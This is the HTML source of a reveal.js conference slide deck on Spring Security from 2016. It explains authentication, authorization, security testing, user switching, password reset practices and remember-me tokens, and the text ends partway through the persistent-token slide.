<!doctype html>
<html>
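<head>
<meta charset="utf-8">
<!-- maximum-scale / user-scalable=no dropped: they disable pinch-zoom (WCAG 1.4.4);
reveal.js scales the deck to the viewport itself -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Spring Security, 2016</title>
<link rel="stylesheet" href="css/reveal.css">
<link rel="stylesheet" href="css/clock.css">
<link rel="stylesheet" href="css/theme/night.css" id="theme">
<!-- Theme used for syntax highlighting of code -->
<link rel="stylesheet" href="lib/css/zenburn.css">
<!-- Printing and PDF exports: the print stylesheet is picked from the URL query
(?print-pdf selects pdf.css, anything else paper.css). The inline script and style
below need 'unsafe-inline' or a nonce under a strict CSP; move them to files if one is added. -->
<script>
var link = document.createElement( 'link' );
link.rel = 'stylesheet';
// type="text/css" is the default for stylesheet links and is omitted
link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
document.getElementsByTagName( 'head' )[0].appendChild( link );
</script>
<style>
/* "Docs" badge pinned to the top-right corner, stacked above the slides (z-index 100) */
.documentation {
font-family: sans-serif;
color: #fff;
display: inline-block;
font-weight: 100;
text-align: center;
position: absolute;
margin: 15px;
top: 0;
right: 100px;
z-index: 100;
}
/* outer pill of the badge */
.documentation > div {
padding: 10px;
border-radius: 3px;
background: #343434;
display: inline-block;
}
/* inner link; darker than the pill so it reads as a button */
.documentation div > a {
color: #cecece;
text-decoration: none;
padding: 10px;
border-radius: 3px;
background: #252525;
display: inline-block;
}
/* hover state lightens pill and link together */
.documentation > div:hover {
background: #8b8b8b;
}
.documentation div:hover > a {
background: #606060;
}
</style>
</head>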
<body>
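<div class="documentation">
<div>
<!-- rel="noopener noreferrer": a target="_blank" link must not hand the opened page a window.opener handle -->
<a href="https://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/" target="_blank" rel="noopener noreferrer">Docs</a>
</div>
</div>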
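<div style="display: block; position: absolute; bottom: 40px; left: 50%; width: 1000px; margin-left: -500px; z-index: 20;">
<!-- Sponsor strip shown under every slide. Every logo opens the sponsor site in a new tab,
so each link carries rel="noopener noreferrer"; the duplicated target attributes are gone
and height is given in pixels without a unit, as the attribute requires. -->
<table style="width: 100%">
<tr>
<td style="text-align: center; width: 20%"><span style="font-size: 80%; color: #e7ad52;">Pořadatel</span></td>
<td style="text-align: center; width: 20%"><span style="font-size: 80%; color: #e7ad52;">Konference</span></td>
<td style="text-align: center; width: 20%"></td>
<td style="text-align: center; width: 20%"><span style="font-size: 80%; color: #e7ad52;">Gold partner</span></td>
<td style="text-align: center; width: 20%"><span style="font-size: 80%; color: #e7ad52;">Generální partner</span></td>
</tr>
<tr>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a href="http://www.gopas.cz" target="_blank" rel="noopener noreferrer"><img src="img/javadayscz2016/Gopas_skola_bile.png" alt="GOPAS" height="30"></a>
</td>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a href="http://www.javadays.cz" target="_blank" rel="noopener noreferrer"><img src="img/javadayscz2016/JD_white_02.png" alt="JavaDays" height="40"></a>
</td>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a href="https://www.fg.cz" target="_blank" rel="noopener noreferrer"><img src="img/jopenspace2013/FG_Forrest_neg.png" alt="FG Forrest" height="30"></a>
</td>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a href="https://www.jetbrains.com/" target="_blank" rel="noopener noreferrer"><img src="img/javadayscz2016/horizontal_spelling_jetbrains_web_logo.png" alt="JetBrains" height="20"></a>
</td>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a href="http://www.commerzsystems.com/" target="_blank" rel="noopener noreferrer"><img src="img/javadayscz2016/Logo-CommerzSystems_JavaDays2016_Pocitacova_skola_GOPAS.png" alt="Commerz Systems" height="30"></a>
</td>
</tr>
</table>
</div>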
<div class="reveal">
<div class="slides">
<!-- INTRO -->
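<section data-background="img/backgrounds/black.jpg">
<!-- Vertical stack: title, about the speaker, feature overview, motivation -->
<section data-background="img/backgrounds/black.jpg">
<h1>Spring Security</h1>
<h2>your gate to authentication and authorization</h2>
<h3>autumn 2016</h3>
<img class="plain" src="img/javadayscz2016/javadays-logo.png" alt="JavaDays 2016">
<p>
<small>Jan <a href="https://www.twitter.com/novoj">@Novoj</a> Novotný</small>
</p>
</section>
<section data-background="img/backgrounds/jno.jpg" data-background-size="contain" style="padding-left: 25%">
<h4 style="margin-bottom: 4em;">
<span style="font-size: 180%">Follow presentation with me at</span><br>
<a href="http://novoj.github.io/reveal.js/spring-security.html" style="font-size: 125%">http://novoj.github.io/reveal.js/spring-security.html</a>
</h4>
<h1>About me</h1>
<ul style="margin-left: 3em;">
<li><a href="https://www.fg.cz">Java developer at FG Forrest</a></li>
<li><a href="https://kafemlejnek.tv">YouTuber at Kafemlejnek.TV</a></li>
<li><a href="http://blog.novoj.net">blogger at blog.novoj.net</a></li>
<li><a href="http://jopenspace.cz">jOpenspace non-conference co-organizer</a></li>
<li><a href="https://www.monkeytracker.cz">co-author of MonkeyTracker service</a></li>
<li>using Spring (Acegi) Security since 2007</li>
<li>occasional speaker, father,<br>MTB rider, runner ...</li>
</ul>
</section>
<section data-background="img/backgrounds/brown.jpg">
<h1>What Spring Security covers</h1>
<ol>
<li>
<strong>authentication</strong>
<ul>
<li>HTTP Basic/Digest/X.509, LDAP, Kerberos, JAAS, OAuth, social networks</li>
<li>password generation / matching, remember me</li>
</ul>
</li>
<li>
<strong>authorization</strong>
<ul>
<li>URL pattern matching</li>
<li>method call authorization, I/O data filtering</li>
<li>expression based / ACL based</li>
</ul>
</li>
<li>
<strong>security negotiation / enforcement</strong>
<ul>
<li>HTTP headers</li>
<li>HTTPS switching</li>
<li>session management</li>
<li>CSRF protection</li>
<li>cross-origin resource sharing</li>
</ul>
</li>
<li><strong>test support</strong></li>
</ol>
</section>
<section data-background="img/backgrounds/brown.jpg">
<h1>Why should you consider it?</h1>
<ol style="text-wrap: avoid">
<li>easy to implement</li>
<li>Spring integration (as you'd expect)</li>
<li>mature and widespread (Acegi started in 2003)</li>
<li>still in active development</li>
<li>easily extensible</li>
<li>well documented and tested</li>
</ol>
</section>
</section>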
<!-- ARCHITECTURE -->
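<section data-background="img/backgrounds/brown.jpg">
<!-- Vertical stack: filter chain, per-path chains, standard filter order, channel/header/session filters -->
<section data-transition="slide-in fade-out">
<h1>Architecture overview</h1>
<img class="plain" src="img/spring-security/filters.png" alt="Servlet filter chain wrapping the request and response" style="width: 50%; float: left">
<!-- a <span> cannot contain a list; the side column is a block next to the floated image,
like the sibling slide below -->
<div style="width: 45%; display: inline-block">
firewalls HTTP request / response<br>
(<a href="https://en.wikipedia.org/wiki/Directory_traversal_attack">directory traversal</a>, <a href="https://prakharprasad.com/crlf-injection-http-response-splitting-explained/">http response splitting</a>)
<br><br>
executes internal list of filters
<br><br>
<strong>Why?</strong>
<br><br>
<ul>
<li>single definition in web.xml <br> (even if it's complex inside)</li>
<li>reliable "interruption" <br> of every single request processing</li>
</ul>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Architecture overview</h1>
<img class="plain" src="img/spring-security/filters-dispatch.png" alt="Requests dispatched to different filter chains by path" style="width: 50%; float: left">
<p style="width: 45%; display: inline-block">
set of filters can differ for various path patterns<br>
<em style="font-size: 80%">(org.springframework.security.web.SecurityFilterChain)</em><br><br>
path matching is done via <em>RequestMatcher</em><br>
mostly via <em>AntPathRequestMatcher</em> but also <em>RegexRequestMatcher</em> and more
</p>
<pre style="width: 45%; display: inline-block">
<code data-trim data-noescape>/foo/*/bar/**/data/*.jpg
/foo/**
/bar/*
/*.html</code>
</pre>
</section>
<section data-transition="fade-in fade-out">
<h1>Architecture overview</h1>
<h2>Standard filter composition</h2>
<div>
<img class="plain" src="img/spring-security/filters-standard.png" alt="Standard Spring Security filter order" style="width: 25%; float: left">
<ol style="width: 45%; display: inline-block; padding-top: 2em; font-size: 80%">
<li style="margin-bottom: 0.75em">loads SecurityContext from SecurityContext repository (usually HTTP session) and stores it there also</li>
<li style="margin-bottom: 0.75em">monitors specific URL and logs a user out</li>
<li style="margin-bottom: 0.75em">does authentication (username, LDAP, OAuth ...)</li>
<li style="margin-bottom: 0.75em">handles AccessDeniedException and AuthenticationException navigating user to proper locations</li>
<li style="margin-bottom: 0.75em">examines each request against AccessDecisionManager and throws AccessDeniedException eventually</li>
<li style="margin-bottom: 0.75em">stores SecurityContext</li>
</ol>
</div>
<div style="font-size: 80%; text-align: center; clear: both">
<a href="https://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/ns-config.html#filter-stack">Standard filters and their ordering</a>
</div>
</section>
<section data-transition="fade-in slide-out">
<h1>Architecture overview</h1>
<h3>Channel enforcement</h3>
<p>ChannelProcessingFilter - relocates user from HTTP to HTTPS (and vice versa) when <em>ChannelDecisionManager</em> says so</p>
<h3>HTTP headers management</h3>
<p>HeaderWriterFilter - takes care of writing HTTP security headers to the response</p>
<ul>
<li><a href="http://blogs.msdn.com/b/ieinternals/archive/2011/01/31/controlling-the-internet-explorer-xss-filter-with-the-x-xss-protection-http-header.aspx">XXssProtectionHeaderWriter</a></li>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options">XFrameOptionsHeaderWriter</a></li>
<li><a href="https://tools.ietf.org/html/rfc6797">HstsHeaderWriter</a></li>
<li>StaticHeadersWriter (for instance CacheControlHeadersWriter)</li>
</ul>
<h3>Session management</h3>
<p>ConcurrentSessionFilter - tracks presence of all sessions,<br> SessionManagementFilter - enforces session management</p>
</section>
</section>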
<!-- CONFIGURATION -->
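<section data-background="img/backgrounds/brown.jpg">
<h1>Configuration</h1>
<p>Both types of configuration are similar to one another.</p>
<!-- Two equivalent configurations, each linked to a gist; the icons are link images, so alt names the destination -->
<div style="text-align: center; float: left; width: 47%; display: inline-block">
<h3>Security namespace</h3>
<a style="margin: 2em;" href="https://gist.github.com/novoj/2299f52b770f5610071e94078b1c1597"><img class="plain" src="img/spring-security/xml-file.png" alt="XML security namespace example (gist)" height="128"></a><br>
<a style="margin: 2em;" href="https://gist.github.com/novoj/2299f52b770f5610071e94078b1c1597">Click to show</a>
</div>
<div style="text-align: center; width: 47%; display: inline-block">
<h3>Java configuration</h3>
<a style="margin: 2em;" href="https://gist.github.com/novoj/f3e8a7a47e262ba79776089aeb98092c"><img class="plain" src="img/spring-security/java-file.png" alt="Java configuration example (gist)" height="128"></a><br>
<a style="margin: 2em;" href="https://gist.github.com/novoj/f3e8a7a47e262ba79776089aeb98092c">Click to show</a>
</div>
</section>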
<!-- AUTHENTICATION -->
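<section data-background="img/backgrounds/brown.jpg">
<!-- Vertical stack: authentication flow, login, what happens on login, logout.
reveal.js supports one level of vertical nesting, so the third-level <section> that
wrapped the first slide has been folded into its parent. -->
<section data-transition="slide-in fade-out">
<h1>Authentication process</h1>
<img src="img/spring-security/resources-access.png" alt="Secured resource access" style="max-height: 600px">
</section>
<section data-transition="fade-in fade-out">
<h1>Login</h1>
<div>
<img class="plain" src="img/spring-security/login.png" alt="Login" style="width: 15%; float: left">
<ul>
<li>always use HTTPS protocol</li>
<li>always use POST</li>
<li>use CSRF token</li>
<li>use the same error message when credentials don't match</li>
</ul>
</div>
<div style="clear: both; text-align: center">
<a style="margin: 2em;" href="http://localhost:8091/?message=views/login.html">Example</a>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Login</h1>
<div style="text-align: center; float: left; width: 47%; display: inline-block">
<h3>What happens during login</h3>
<p style="text-align: left; font-size: 80%">
Typically <a href="http://localhost:8091/?message=org/springframework/security/web/authentication/UsernamePasswordAuthenticationFilter.java">UsernamePasswordAuthenticationFilter</a>
uses <a href="http://localhost:8091/?message=org/springframework/security/authentication/ProviderManager.java">AuthenticationManager</a> that calls
<a href="http://localhost:8091/?message=org/springframework/security/authentication/AuthenticationProvider.java">AuthenticationProvider</a> (usually
<a href="http://localhost:8091/?message=org/springframework/security/authentication/dao/DaoAuthenticationProvider.java">DaoAuthenticationProvider</a>)
to load user details from <a href="http://localhost:8091/?message=org/springframework/security/core/userdetails/UserDetailsService.java">UserDetailsService</a> implementation.
</p>
<p style="text-align: left; font-size: 80%"><a href="http://localhost:8091/?message=org/springframework/security/authentication/dao/DaoAuthenticationProvider.java">DaoAuthenticationProvider</a>
checks validity of the password via <a href="http://localhost:8091/?message=org/springframework/security/crypto/password/PasswordEncoder.java">PasswordEncoder</a>.</p>
<p style="text-align: left; font-size: 80%">When the password is ok, a new <a href="http://localhost:8091/?message=org/springframework/security/core/Authentication.java">Authentication</a> object is created and stored in
<a href="http://localhost:8091/?message=org/springframework/security/core/context/SecurityContext.java">SecurityContext</a>.</p>
</div>
<div style="text-align: center; width: 47%; display: inline-block">
<h3>Subsequent requests</h3>
<p style="text-align: left; font-size: 80%">
<a href="http://localhost:8091/?message=org/springframework/security/web/context/SecurityContextPersistenceFilter.java">SecurityContextPersistenceFilter</a>
fills <a href="http://localhost:8091/?message=org/springframework/security/core/context/SecurityContextHolder.java">SecurityContextHolder</a> (usually <em>ThreadLocal</em>) with
<a href="http://localhost:8091/?message=org/springframework/security/core/context/SecurityContext.java">SecurityContext</a> from
<a href="http://localhost:8091/?message=org/springframework/security/web/context/SecurityContextRepository.java">SecurityContextRepository</a>
</p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Logout</h1>
<img class="plain" src="img/spring-security/logout.png" alt="Logout" style="width: 15%; float: left">
<div>
<div style="float: left; margin-left: 2em;">
<h4>Recommendations</h4>
<ul>
<li>always use POST</li>
<li>use CSRF token</li>
</ul>
</div>
<div style="margin-left: 2em;">
<h4>What happens on logout</h4>
<ul>
<li>session is invalidated</li>
<li>remember me tokens are cleared</li>
<li>custom cookies might be cleared</li>
<li>CSRF token is invalidated</li>
<li>SecurityContext is emptied</li>
<li>user is navigated to logout page</li>
</ul>
</div>
</div>
<div style="clear: both; text-align: center; margin-top: 1em;">
<a style="margin: 2em;" href="http://localhost:8091/?message=views/layout.html:85">Example</a>
</div>
</section>
</section>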
<!-- AUTHORIZATION -->
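<section data-background="img/spring-security/authorization.jpg" data-background-size="30%" data-background-color="black" data-background-position="left">
<!-- Vertical stack: decision model, built-in expressions, web expressions, method security,
role hierarchy, permissions, meta-annotations.
Code samples without data-noescape must escape < and > as &lt; / &gt;, otherwise the
browser parses tags such as <http> or List<Contact> as elements and the displayed
sample loses them. -->
<section data-transition="fade-in fade-out">
<h1>Authorization</h1>
<div style="float: left; width: 65%; font-size: 80%; text-align: right">
<img class="plain" src="img/spring-security/auth-model.png" alt="AccessDecisionManager consulting its AccessDecisionVoters">
</div>
<div style="float: left; margin-left: 2em; width: 30%; font-size: 60%;">
<h3>AccessDecisionManager</h3>
<ul style="width: 100%">
<li>AffirmativeBased:<br><em>SINGLE GRANT -> GRANT</em></li>
<li>UnanimousBased:<br><em>SINGLE DENY -> DENY</em></li>
<li>ConsensusBased:<br><em>sum(GRANT) > sum(DENY) -> GRANT</em></li>
</ul>
<h3 style="margin-top: 1em">AccessDecisionVoter</h3>
<ul style="width: 100%">
<li>AuthenticatedVoter:<br><em>IS_AUTHENTICATED_FULLY, IS_AUTHENTICATED_REMEMBERED, IS_AUTHENTICATED_ANONYMOUSLY</em></li>
<li>RoleVoter (RoleHierarchyVoter):<br><em>ROLE_ (GrantedAuthority)</em></li>
<li>WebExpressionVoter:<br><em>SpEL expression</em></li>
</ul>
</div>
<div style="clear: both; width: 85%; float: right; margin-top: 1em">
<strong>SecurityConfig example:</strong>
<!-- the expression rule now closes its #{...} block -->
<pre style="display: inline-block;"><code class="xml" data-trim data-noescape>/admin/**=<mark>ROLE_ADMINISTRATOR</mark>, <mark>ROLE_SUPER_ADMINISTRATOR</mark>
/userManagement/**=<mark>#{hasRole('ROLE_COMPANY_OWNER') and hasIpAddress('192.168.1.0/24')}</mark>
/**=<mark>IS_AUTHENTICATED_ANONYMOUSLY</mark></code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Built-in-expressions</h1>
<a href="https://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/el-access.html#el-common-built-in">
<img src="img/spring-security/built-in-expressions.png" alt="Table of common built-in security expressions (reference documentation)" width="800">
</a>
</section>
<section data-transition="fade-in fade-out">
<h1>Web expression security</h1>
<p>You can use either <em>simple rules</em> or <em>expression rules</em>, not both.</p>
<div style="clear: both; width: 75%; margin-left: 15%">
<pre style="display: inline-block;"><code class="xml" data-trim>&lt;http use-expressions="true"&gt;
&lt;intercept-url pattern="/user/{userId}/**"
access="@myAuthService.checkUserId(authentication,#userId)"/&gt;
&lt;/http&gt;</code></pre>
<p>@ refers to Spring bean objects<br>
# refers to url parameters</p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Method security</h1>
<p>Operates using Spring AOP abstraction.<br>Thus you can configure it manually by custom Aspects or exact mapping.</p>
<h3>Expression based security</h3>
<div style="width: 25%; margin-left: 15%; float: left;">
<p>Method annotations:</p>
<ul style="list-style-type: none">
<li>@PreAuthorize</li>
<li>@PreFilter</li>
<li>@PostAuthorize</li>
<li>@PostFilter</li>
</ul>
</div>
<div style="float: left; width: 55%; font-size: 100%; margin-left: 2em;">
<!-- <pre> is flow content and may not sit inside <p>; the parser would close the paragraph early -->
<pre style="display: inline-block;"><code class="java" data-trim>@PreAuthorize("#contact.name == authentication.name")
public void doSomething(Contact contact);
@PreAuthorize("hasRole('USER')")
@PostFilter("hasPermission(filterObject, 'read')")
public List&lt;Contact&gt; getAll();</code></pre>
<p>Filtering is not suitable for paged output.<br>
But Spring Security can <a href="https://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/data-query.html">integrate with Spring Data</a>!</p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Hierarchical roles</h1>
<div style="clear: both">
<p>Useful in scenarios when a user having a certain role<br>should also have another role.</p>
<strong>Example:</strong>
</div>
<div style="clear: both; width: 30%; margin-left: 35%">
<pre style="display: inline-block;"><code class="xml" data-trim>ROLE_ADMIN > ROLE_STAFF
ROLE_STAFF > ROLE_USER
ROLE_USER > ROLE_GUEST</code></pre>
</div>
<p>Admin will also be STAFF, USER, GUEST regarding access decision logic.<br>Hierarchy rules can be changed without touching user data.</p>
</section>
<section data-transition="fade-in fade-out">
<h1>Permissions</h1>
<p>If you need a more robust authorization system - i.e. when roles are not enough.</p>
<p>Implement your own <a href="http://localhost:8091/?message=org/springframework/security/access/PermissionEvaluator.java">PermissionEvaluator</a></p>
<div style="clear: both; width: 95%; margin-left: 5%; font-size: 90%;">
<pre style="display: inline-block;"><code class="java" data-trim>public interface PermissionEvaluator extends AopInfrastructureBean {
boolean hasPermission(Authentication authentication, Object targetDomainObject, Object permission);
boolean hasPermission(Authentication authentication, Serializable targetId, String targetType, Object permission);
}</code></pre>
</div>
<p>And configure it:</p>
<div style="clear: both; width: 95%; margin-left: 5%; font-size: 80%;">
<pre style="display: inline-block;"><code class="xml" data-trim>&lt;security:global-method-security pre-post-annotations="enabled"&gt;
&lt;security:expression-handler ref="expressionHandler"/&gt;
&lt;/security:global-method-security&gt;
&lt;bean id="expressionHandler"
class="org.springframework.security.access.expression.method.DefaultMethodSecurityExpressionHandler"&gt;
&lt;property name="permissionEvaluator" ref="myPermissionEvaluator"&gt;&lt;/property&gt;
&lt;/bean&gt;</code></pre>
</div>
<p>Or use the <a href="https://docs.spring.io/spring-security/site/docs/current/reference/html/domain-acls.html">already implemented ACL system</a> from Spring Security.</p>
</section>
<section data-transition="fade-in fade-out">
<h1>Meta annotations</h1>
<p style="margin-left: 20%; text-align: center">Allows you to mitigate String based "programming".</p>
<div style="float: left; width: 80%; margin-left: 20%; margin-bottom: 2em;">
<h3>Define meta-annotation</h3>
<pre style="display: inline-block;"><code class="java" data-trim>@Retention(RetentionPolicy.RUNTIME)
@PreAuthorize("#contact.name == authentication.name")
public @interface ContactPermission {}</code></pre>
<h3>Use meta-annotation</h3>
<pre style="display: inline-block;"><code class="java" data-trim>@ContactPermission
public void doSomething(Contact contact);</code></pre>
</div>
<p style="margin-left: 20%; text-align: center">
Currently doesn't allow multiple annotations on a single method.
<br><a href="https://github.com/spring-projects/spring-security/issues/4003">Issue #4003</a>
</p>
</section>
</section>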
<!-- TESTING -->
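<section data-background="img/spring-security/testing.png">
<!-- Vertical stack: testing practices, method-security test, test meta-annotations, MockMvc support -->
<section data-transition="fade-in fade-out">
<h1>Security testing</h1>
<h3>Best practices ™</h3>
<ul style="width: 80%">
<li><strong>do test</strong> the security in integration tests along with business logic</li>
<li>prepare a set of <strong>personas</strong> for each role</li>
<li>test <strong>negative scenarios</strong> that should finish with AccessDeniedException</li>
<li>extract complex security expressions to an <strong>access check method</strong> or
<strong>PermissionEvaluator</strong>, unit test these methods carefully</li>
</ul>
</section>
<section data-transition="fade-in fade-out">
<h1>Method authorization</h1>
<h3>Test example</h3>
<div style="float: left; width: 100%; margin-bottom: 2em;">
<pre style="display: inline-block;"><code class="java" style="font-size: 80%; max-height: 600px;" data-trim>@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration
@SecurityExecutionListeners
public class ExampleTestClass {
@Test(expected = AccessDeniedException.class)
@WithAnonymousUser
public void getMessageUnauthenticated() {
messageService.getMessage();
}
@Test
@WithUserDetails("[email protected]")
public void getMessageAsClientUser() {
assertNotNull(messageService.getMessage());
}
@Test
@WithUserDetails("[email protected]")
public void getMessageAsAdminUser() {
assertNotNull(messageService.getMessage());
}
}</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Test meta-annotations</h1>
<div style="float: left; width: 100%; margin-bottom: 2em;">
<p>To avoid strings in annotations and add better maintainability use meta-annotations:</p>
<pre style="display: inline-block;"><code class="java" style="font-size: 80%; max-height: 600px;" data-trim>@Retention(RetentionPolicy.RUNTIME)
@WithUserDetails(value="[email protected]")
public @interface RunAsAdministrator { }</code></pre>
<p>And use it in test:</p>
<!-- the admin test uses the annotation exactly as defined above (RunAsAdministrator) -->
<pre style="display: inline-block;"><code class="java" style="font-size: 80%; max-height: 600px;" data-trim>@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration
@SecurityExecutionListeners
public class ExampleTestClass {
@Test
@RunAsClient
public void getMessageAsClientUser() {
assertNotNull(messageService.getMessage());
}
@Test
@RunAsAdministrator
public void getMessageAsAdminUser() {
assertNotNull(messageService.getMessage());
}
}</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Spring MVC test support</h1>
<div style="float: left; width: 100%; margin-bottom: 2em;">
<!-- formLogin() and logout() from SecurityMockMvcRequestBuilders post-process the request with
csrf() themselves; the earlier ".with(csrf())" was chained on the perform() result (the wrong
object) and left an unbalanced parenthesis, so it is dropped here -->
<pre style="display: inline-block;"><code class="java" style="font-size: 70%; line-height: 1.4em; max-height: 600px;" data-trim>import static org.springframework.security.test.web.servlet.request.SecurityMockMvcRequestPostProcessors.*;
import static org.springframework.security.test.web.servlet.setup.SecurityMockMvcConfigurers.*;
import static org.springframework.security.test.web.servlet.request.SecurityMockMvcRequestBuilders.*;
@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration
@WebAppConfiguration
public class ExampleTestClass {
@Autowired
private WebApplicationContext context;
private MockMvc mvc;
@Before
public void setup() {
mvc = MockMvcBuilders.webAppContextSetup(context)
.apply(springSecurity())
.build();
}
@Test
@WithAnonymousUser
public void shouldUserLogin() {
mvc.perform(formLogin("/auth").user("admin").password("pass"))
.andExpect(authenticated());
}
@Test
@RunAsClient
public void shouldUserLogout() {
mvc.perform(logout("/signout"))
.andExpect(unauthenticated());
}
}</code></pre>
</div>
</section>
</section>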
<!-- USER SWITCHING -->
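<section data-background="img/backgrounds/brown.jpg">
<h1>User switching</h1>
<img src="img/spring-security/user-switch.png" alt="User switching" class="plain" width="200" style="float: left;">
<div style="float: left; margin-left: 2em; width: 65%; font-size: 80%;">
<p>Handy for developers as well as for customer administrators. Allows a user with admin roles to switch
to any other user with lower roles without knowing the password.</p>
<!-- the exit URL in the authorization rules must be the one passed to setExitUserUrl();
a mismatch leaves the "switch back" endpoint governed by whatever rule follows -->
<pre style="display: inline-block;"><code class="java" data-trim>@Override
protected void configure(HttpSecurity http) throws Exception {
final SwitchUserFilter filter = new SwitchUserFilter();
filter.setSwitchUserUrl("/switchUser");
filter.setUsernameParameter("username");
filter.setExitUserUrl("/restoreUserBack");
http.addFilterAfter(filter, FilterSecurityInterceptor.class)
.authorizeRequests()
.antMatchers("/switchUser").hasAnyAuthority("ROLE_ADMIN")
.antMatchers("/restoreUserBack").authenticated();
}</code></pre>
<p>Consider also adding an IP check or other authentication checks to better secure user switching.</p>
<p><strong>Warning!</strong> This feature is kind of a backdoor to your application.</p>
</div>
</section>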
<!-- OUTRO -->
<section data-background="img/backgrounds/black.jpg">
<img src="img/backgrounds/attention.jpg" alt="" width="800">
<h2>Thank you for your attention</h2>
<p>Contact me at <a href="https://www.twitter.com/novoj">@Novoj</a> or <a href="mailto:[email protected]">[email protected]</a></p>
</section>
<!-- PASSWORD MANAGEMENT -->
<section data-background="img/backgrounds/brown.jpg">
<section data-transition="fade-in fade-out">
<h1>Password management</h1>
<img class="plain" src="img/spring-security/password.jpg" alt="Password" style="width: 30%; float: left">
<div style="text-align: left; float: left; margin-left: 2em; width: 65%; font-size: 80%;">
<h3>Hygienic rules to follow:</h3>
<ul>
<li>Use a slow hashing function with a unique salt per user (Spring Security's default is bcrypt).</li>
<li>Don't send passwords in e-mails.</li>
<li>Require strong passwords from users.</li>
<li>Send login credentials only over SSL/TLS (HTTPS).</li>
<li>When a user changes their password or e-mail, require them to enter their current password.</li>
<li>Do not keep users' passwords (hashes) loaded in memory.</li>
</ul>
<h3 style="margin-top: 1em">Spring Security helps you with</h3>
<ul>
<li>hashing passwords</li>
<li>enforcing SSL</li>
<li>clearing the password from the logged-in user object</li>
</ul>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Lost password facility</h1>
<h3>Hygienic rules to follow:</h3>
<img class="plain" src="img/spring-security/reset.png" alt="Reset password" style="width: 30%; float: left">
<div style="float: left; margin-left: 2em; width: 65%; font-size: 80%;">
<ul>
<li>If a user forgets their password, send them a secure one-time reset link, using a randomly generated reset token stored in the database. The token must be unique and secret, so hash the token in the database and compare it when the link is used.</li>
<li>Return the same response whether the user exists or not.</li>
<li>Enforce that a token can only be used to reset the password of the user who requested it.</li>
<li>Store the token in the database only in a "hashed" form.</li>
<li>Once the token is used, it must be deleted from the database and must not be allowed to be used again.</li>
<li>Have all password-equivalent tokens, including reset tokens, expire after a short time, e.g. 48 hours. This prevents an attacker from exploiting unused tokens at a later date.</li>
<li>Immediately display a form that lets the user set a new password. Do not use temporary, randomly generated passwords!</li>
<li>Do not use "secret questions".</li>
</ul>
</div>
</section>
</section>
<!-- REMEMBER ME -->
<section data-background="img/backgrounds/brown.jpg">
<section data-transition="fade-in fade-out">
<h1>Remember me, hot or not?</h1>
<div style="text-align: center">
<img class="plain" src="img/spring-security/remember-me.png" alt="Keep me signed in" style="width: 25%;">
</div>
<div style="float: left; margin-left: 2em;">
<h4>Things to consider</h4>
<ul>
<li>users do like it</li>
<li>when stolen, it logs anyone in</li>
<li>it opens a gap for CSRF attacks</li>
<li>it may reveal original password</li>
</ul>
</div>
<div style="margin-left: 2em;">
<h4>Two basic implementations</h4>
<ul>
<li>Hash-Based Token (default)</li>
<li>Persistent Token Approach</li>
</ul>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Remember me, hot or not?</h1>
<div style="float: left; margin-left: 2em;">
<h4>Require interactive login for</h4>
<ul>
<li>password change</li>
<li>email change</li>
<li>access to sensitive information (address)</li>
<li>important actions (purchase)</li>
</ul>
</div>
<div style="margin-left: 2em;">
<h4>Consider</h4>
<ul>
<li>HTTPS over entire site</li>
<li>Secure cookie flag (must be set explicitly)</li>
<li>HttpOnly cookie flag (must be set explicitly)</li>
</ul>
</div>
<div style="clear: both; margin-top: 2em">
<pre>
<code class="nohighlight" data-trim data-noescape>/userProfile/*=IS_AUTHENTICATED_FULLY
/login=IS_AUTHENTICATED_ANONYMOUSLY
/logout=IS_AUTHENTICATED_ANONYMOUSLY
/lostPassword=IS_AUTHENTICATED_ANONYMOUSLY
/**=IS_AUTHENTICATED_REMEMBERED</code>
</pre>
</div>
<div>
<a href="http://localhost:8091/?message=org/springframework/security/access/vote/AuthenticatedVoter.java:29">Documentation</a>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Hash-Based Token</h1>
<pre style="display: inline-block">
<code class="nohighlight" data-trim data-noescape>base64(username + ":" + expirationTime + ":" +
md5Hex(username + ":" + expirationTime + ":" + password + ":" + key))
username: As identifiable to the UserDetailsService
password: That matches the one in the retrieved UserDetails
expirationTime: The date and time when the remember-me token expires, expressed in milliseconds
key: A private key to prevent modification of the remember-me token</code>
</pre>
<h4>Disadvantages</h4>
<ul>
<li>username + expiration time known to the attacker</li>
<li>password is part of the hash</li>
<li>the MD5 hash is very fast (cheap to brute-force)</li>
<li>key is shared among all users</li>
</ul>
</section>
<section data-transition="fade-in fade-out">
<h1>Persistent Token Approach</h1>
<div style="float: left; width: 45%; font-size: 80%; margin-left: 2em;">
<h3>How it works</h3>
<ol>
<li>on successful login with Remember Me checked, a login cookie is issued</li>
<li>cookie consists of <code>series:token</code></li>
<li>the series and token are unguessable random numbers from a suitably large space</li>
<li>data is stored together with user name in a database table</li>
<li>when a non-logged-in user visits the site with a login cookie, it is looked up in the database</li>
<li>if it is present, the system logs in the user whose name is stored with the pair in the database</li>
<li>used token is removed from the database</li>
